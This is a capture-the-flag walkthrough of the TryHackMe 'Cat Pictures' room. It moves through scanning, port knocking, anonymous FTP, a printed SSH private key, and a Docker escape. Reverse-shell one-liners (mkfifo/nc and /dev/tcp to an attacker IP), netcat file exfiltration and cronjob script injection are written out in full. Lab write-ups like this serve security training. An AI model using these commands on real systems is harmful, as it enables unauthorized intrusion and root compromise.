🐈Cat Pictures

Introduction

Room Name: Cat Pictures

Room Link: https://tryhackme.com/r/room/catpictures

1- Scanning

nmap -sT -sV 10.10.196.124

Results

┌──(kali㉿kali)-[~]
└─$ nmap -sT -sV 10.10.196.124
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-23 00:10 EET
Nmap scan report for 10.10.196.124
Host is up (0.080s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
8080/tcp open  http    Apache httpd 2.4.46 ((Unix) OpenSSL/1.1.1d PHP/7.3.27)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 59.26 seconds

Ports Open

22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
8080/tcp open  http    Apache httpd 2.4.46 ((Unix) OpenSSL/1.1.1d PHP/7.3.27)

2- Port 8080

Open link on Browser

Lets now visit http://10.10.196.124:8080 on firefox

Source code

After inspecting the source code, nothing seems suspicious.

Post cat pictures here!

Once I clicked on "Post cat pictures here!", a hint appeared!

Hint: "Knock knock! Magic numbers: 1111, 2222, 3333, 4444."

This means we should do port knocking!

3- Port Knocking

Using a tool called knockd

knock 10.10.196.124 1111 2222 3333 4444

Running Nmap again

┌──(kali㉿kali)-[~]
└─$ nmap -sT -sV 10.10.196.124
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-23 00:26 EET
Nmap scan report for 10.10.196.124
Host is up (0.088s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 3.0.3
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
8080/tcp open  http    Apache httpd 2.4.46 ((Unix) OpenSSL/1.1.1d PHP/7.3.27)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.07 seconds

A new port appeared! FTP.

4- Port 21 (ftp)

Login

Lets first try to login as anonymous.

┌──(kali㉿kali)-[~]
└─$ ftp 10.10.196.124      
Connected to 10.10.196.124.
220 (vsFTPd 3.0.3)
Name (10.10.196.124:kali): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.

Successful!

Enumeration

Lets check if this share contains anything useful.

ls -la

A note.txt file appeared. Lets download it and get its content.

get note.txt

ftp> ls -la
229 Entering Extended Passive Mode (|||45409|)
150 Here comes the directory listing.
drwxr-xr-x    2 ftp      ftp          4096 Apr 02  2021 .
drwxr-xr-x    2 ftp      ftp          4096 Apr 02  2021 ..
-rw-r--r--    1 ftp      ftp           162 Apr 02  2021 note.txt
226 Directory send OK.
ftp> get note.txt
local: note.txt remote: note.txt
229 Entering Extended Passive Mode (|||40426|)
150 Opening BINARY mode data connection for note.txt (162 bytes).
100% |***************************************************************************************************************************|   162       51.85 KiB/s    00:00 ETA
226 Transfer complete.
162 bytes received in 00:00 (1.76 KiB/s)
ftp> 

Important things found:

• user named catlover

• password is sardinethecat

• There is a shell on port 4420

5- Port 4420

Connecting to the shell

Now, let's connect to port 4420 using netcat, and enter sardinethecat as password.

nc 10.10.196.124 4420

┌──(kali㉿kali)-[~]
└─$ nc 10.10.196.124 4420
INTERNAL SHELL SERVICE
please note: cd commands do not work at the moment, the developers are fixing it at the moment.
do not use ctrl-c
Please enter password:
sardinethecat
Password accepted

Password Accepted!

Stabilizing the Shell

Lets stabilize the shell.

On the attacker machine, run:

nc lvnp 9001

On the thm VM, run:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $attacker_ip 9001 >/tmp/f

So now, we have a stabilized shell:

┌──(kali㉿kali)-[~]
└─$ nc -lvnp 9001            
listening on [any] 9001 ...
connect to [10.9.0.60] from (UNKNOWN) [10.10.196.124] 45962
/bin/sh: 0: can't access tty; job control turned off
# 

Enumeration

Lets move to the home directory.

There is a user named catlover which we found previously.

cd /home

cd catlover

In /home/catlover, there is a script named runme

Lets move this script to our machine using netcat also, to check what it does.

On the attacker machine, lets run:

nc -lvnp 9002 > runme

On the thm machine, lets run:

nc $attacker_ip$ 9002 < runme

Now, lets read the binary.

strings runme

Important human readable text:

"rebecca Please enter yout password: Welcome, catlover! SSH key transfer queued! touch /tmp/gibmethesshkey Access Denied"

So, this implies that upon entering a password, which might be rebeca, an ssh key should be transferred to /tmp.

After checking the /tmp directory, nothing is found.

The ssh key was transfered to /home/catlover.

# cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
MIIEogIBAAKCAQEAmI1dCzfMF4y+TG3QcyaN3B7pLVMzPqQ1fSQ2J9jKzYxWArW5
IWnCNvY8gOZdOSWgDODCj8mOssL7SIIgkOuD1OzM0cMBSCCwYlaN9F8zmz6UJX+k
jSmQqh7eqtXuAvOkadRoFlyog2kZ1Gb72zebR75UCBzCKv1zODRx2zLgFyGu0k2u
xCa4zmBdm80X0gKbk5MTgM4/l8U3DFZgSg45v+2uM3aoqbhSNu/nXRNFyR/Wb10H
tzeTEJeqIrjbAwcOZzPhISo6fuUVNH0pLQOf/9B1ojI3/jhJ+zE6MB0m77iE07cr
lT5PuxlcjbItlEF9tjqudycnFRlGAKG6uU8/8wIDAQABAoIBAH1NyDo5p6tEUN8o
aErdRTKkNTWknHf8m27h+pW6TcKOXeu15o3ad8t7cHEUR0h0bkWFrGo8zbhpzcte
D2/Z85xGsWouufPL3fW4ULuEIziGK1utv7SvioMh/hXmyKymActny+NqUoQ2JSBB
QuhqgWJppE5RiO+U5ToqYccBv+1e2bO9P+agWe+3hpjWtiAUHEdorlJK9D+zpw8s
/+9CjpDzjXA45X2ikZ1AhWNLhPBnH3CpIgug8WIxY9fMbmU8BInA8M4LUvQq5A63
zvWWtuh5bTkj622QQc0Eq1bJ0bfUkQRD33sqRVUUBE9r+YvKxHAOrhkZHsvwWhK/
oylx3WECgYEAyFR+lUqnQs9BwrpS/A0SjbTToOPiCICzdjW9XPOxKy/+8Pvn7gLv
00j5NVv6c0zmHJRCG+wELOVSfRYv7z88V+mJ302Bhf6uuPd9Xu96d8Kr3+iMGoqp
tK7/3m4FjoiNCpZbQw9VHcZvkq1ET6qdzU+1I894YLVu258KeCVUqIMCgYEAwvHy
QTo6VdMOdoINzdcCCcrFCDcswYXxQ5SpI4qMpHniizoa3oQRHO5miPlAKNytw5PQ
zSKoIW47AObP2twzVAH7d+PWRzqAGZXW8gsF6Ls48LxSJGzz8V191PjbcGQO7Oro
Em8pQ+qCISxv3A8fKvG5E9xOspD0/3lsM/zGD9ECgYBOTgDAuFKS4dKRnCUt0qpK
68DBJfJHYo9DiJQBTlwVRoh/h+fLeChoTSDkQ5StFwTnbOg+Y83qAqVwsYiBGxWq
Q2YZ/ADB8KA5OrwtrKwRPe3S8uI4ybS2JKVtO1I+uY9v8P+xQcACiHs6OTH3dfiC
tUJXwhQKsUCo5gzAk874owKBgC/xvTjZjztIWwg+WBLFzFSIMAkjOLinrnyGdUqu
aoSRDWxcb/tF08efwkvxsRvbmki9c97fpSYDrDM+kOQsv9rrWeNUf4CpHJQuS9zf
ZSal1Q0v46vdt+kmqynTwnRTx2/xHf5apHV1mWd7PE+M0IeJR5Fg32H/UKH8ROZM
RpHhAoGAehljGmhge+i0EPtcok8zJe+qpcV2SkLRi7kJZ2LaR97QAmCCsH5SndzR
tDjVbkh5BX0cYtxDnfAF3ErDU15jP8+27pEO5xQNYExxf1y7kxB6Mh9JYJlq0aDt
O4fvFElowV6MXVEMY/04fdnSWavh0D+IkyGRcY5myFHyhWvmFcQ=
-----END RSA PRIVATE KEY-----

6- Port 22 (ssh)

Transfer the id_rsa to the attacker machine.

chmod 600 id_rsa

ssh -i id_rsa catlover@10.10.196.124

Login

Lets now try to login using the key.

┌──(kali㉿kali)-[~/tryhackme]
└─$ ssh -i id_rsa catlover@10.10.196.124
The authenticity of host '10.10.196.124 (10.10.196.124)' can't be established.
ED25519 key fingerprint is SHA256:1eaD00/uot2wrnOhWADr5ZbjIDs9twYBymqkwtQKXk0.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.196.124' (ED25519) to the list of known hosts.
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-142-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Fri Nov 22 15:21:01 PST 2024

  System load:                    0.0
  Usage of /:                     37.2% of 19.56GB
  Memory usage:                   71%
  Swap usage:                     0%
  Processes:                      113
  Users logged in:                0
  IP address for eth0:            10.10.196.124
  IP address for br-98674f8f20f9: 172.18.0.1
  IP address for docker0:         172.17.0.1


52 updates can be applied immediately.
25 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable


Last login: Fri Jun  4 14:40:35 2021
root@7546fa2336d6:/#

Successful!

Enumeration

Flag 1

root@7546fa2336d6:/# ls -la
total 108
drwxr-xr-x   1 root root 4096 Mar 25  2021 .
drwxr-xr-x   1 root root 4096 Mar 25  2021 ..
-rw-------   1 root root  588 Jun  4  2021 .bash_history
-rwxr-xr-x   1 root root    0 Mar 25  2021 .dockerenv
drwxr-xr-x   1 root root 4096 Apr  9  2021 bin
drwxr-xr-x   3 root root 4096 Mar 24  2021 bitnami
drwxr-xr-x   2 root root 4096 Jan 30  2021 boot
drwxr-xr-x   5 root root  340 Nov 22 22:08 dev
drwxr-xr-x   1 root root 4096 Apr  9  2021 etc
drwxr-xr-x   2 root root 4096 Jan 30  2021 home
drwxr-xr-x   1 root root 4096 Sep 25  2017 lib
drwxr-xr-x   2 root root 4096 Feb 18  2021 lib64
drwxr-xr-x   2 root root 4096 Feb 18  2021 media
drwxr-xr-x   2 root root 4096 Feb 18  2021 mnt
drwxrwxr-x   1 root root 4096 Mar 25  2021 opt
drwxrwxr-x   2 root root 4096 Mar 24  2021 post-init.d
-rwxrwxr-x   1 root root  796 Mar 24  2021 post-init.sh
dr-xr-xr-x 124 root root    0 Nov 22 22:08 proc
drwx------   1 root root 4096 Mar 25  2021 root
drwxr-xr-x   4 root root 4096 Feb 18  2021 run
drwxr-xr-x   1 root root 4096 Apr  9  2021 sbin
drwxr-xr-x   2 root root 4096 Feb 18  2021 srv
dr-xr-xr-x  13 root root    0 Nov 22 23:24 sys
drwxrwxrwt   1 root root 4096 Nov 22 22:09 tmp
drwxrwxr-x   1 root root 4096 Mar 24  2021 usr
drwxr-xr-x   1 root root 4096 Feb 18  2021 var

cd /root

cat flag.txt

flag.txt: 7cf90a0e7c5d25f1a827d3efe6fe4d0xxxxxxxxx

(Note: This flag is within the docker container, and not the actual host machine, so we need to escape the docker container).

Flag 2

Lets now escape the container, and find the root flag.

Lets automate the process with linpeas:

copy linpeas from the host machine to the docker container.

Then:

chmod +x linpeas.sh

Reading linpeas carefully, I found a script named clean.sh in /opt/clean/clean.sh, which we can modify. (It is a cronjob).

Now, lets insert in it this reverse shell: /bin/sh -i >& /dev/tcp/10.9.0.60/9003 0>&1

open a netcat listener on the attacker machine.

Successful connection!

cat root.txt

root.txt: "4a98e43d78bab283938a06f38d2ca3xxxxxxxxxx"